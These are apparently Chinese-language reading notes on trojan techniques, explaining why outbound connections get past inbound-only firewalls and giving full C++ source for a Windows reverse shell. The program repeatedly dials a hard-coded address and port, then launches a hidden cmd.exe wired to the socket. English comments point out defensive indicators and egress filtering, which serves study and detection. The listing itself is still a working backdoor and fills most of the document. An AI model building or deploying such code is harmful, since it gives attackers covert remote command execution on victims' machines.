此为《木马技术揭秘与防御》系列读书笔记
原理比较简单:
“堡垒总是从内部被突破的”,在服务端(被控主机)运行木马,由它主动连接到指定ip、port的客户端(控制端)
防火墙对内部发起的连接请求无条件信任,因此这种由内向外的连接可以绕过针对入站连接的ip包过滤规则(这里指未配置出站过滤的防火墙;对出站的目的地址和端口做限制即可阻断此类连接)
#include <iostream>
#include <WINSOCK2.H>
#pragma comment(lib,"ws2_32.lib")
#pragma comment(lib,"advapi32.lib")
#pragma comment(lib,"user32.lib")

using namespace std;
// Study sample from the reading notes: a reverse-connection ("connect-back") program.
// The process dials out to a hard-coded address and, once connected, starts cmd.exe
// with a hidden window and with stdin/stdout/stderr set to the connected socket.
//
// Traits a defender can look for, all visible in this listing:
//   - repeated outbound TCP connection attempts to one fixed address/port, 30 s apart;
//   - a cmd.exe child process created with a hidden window and inherited handles
//     by a parent that holds an outbound TCP connection;
//   - no inbound listener, so inbound-only packet filtering never sees it; egress
//     filtering on destination address/port is the control that applies.
int main()
{
    WSAData wsaData;
    SOCKET socket;
    SOCKADDR_IN sockadd_in;

    // Requests Winsock version 1.1; the return value is not checked.
    WSAStartup(MAKEWORD(1,1),&wsaData);
    // TCP/IPv4 socket; the result is not compared with INVALID_SOCKET.
    socket = WSASocket(PF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0);

    // Hard-coded destination (a private-range address in the author's lab setup,
    // presumably) and port: these are the network indicators of this sample.
    char ip[] = "192.168.199.1\x00";
    unsigned short port = 999;

    sockadd_in.sin_addr.s_addr = inet_addr(ip);
    sockadd_in.sin_family = AF_INET;
    sockadd_in.sin_port = htons(port);

    // connect() returns non-zero on failure, so this loop retries every 30000 ms
    // until the destination accepts the connection. The fixed interval shows up
    // as a regular pattern in firewall or flow logs.
    while(connect(socket,(struct sockaddr*)&sockadd_in,sizeof(sockadd_in))){
        Sleep(30000);
    }

    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    memset(&si,0,sizeof(si));
    si.cb = sizeof(si);
    // STARTF_USESHOWWINDOW makes wShowWindow take effect; STARTF_USESTDHANDLES makes
    // the three hStd* fields below take effect.
    si.dwFlags = STARTF_USESHOWWINDOW+STARTF_USESTDHANDLES;
    // SW_HIDE: the child process gets no visible window.
    si.wShowWindow = SW_HIDE;
    // All three standard handles of the child are the connected socket.
    si.hStdInput = si.hStdOutput = si.hStdError = (void*)socket;
    // bInheritHandles is TRUE, so the child inherits the parent's inheritable handles.
    if(!CreateProcess(NULL,"cmd.exe",NULL,NULL,TRUE,0,0,NULL,&si,&pi)){
        cout<<"failed"<<endl;
        //998:ERROR_NOACCESS
        // (author's note; presumably the error code printed below during their test)
        cout<<GetLastError()<<endl;
    }

    // main returns right after the CreateProcess call: pi.hProcess/pi.hThread and the
    // socket are never closed here, and WSACleanup is never called.
    return 0;
}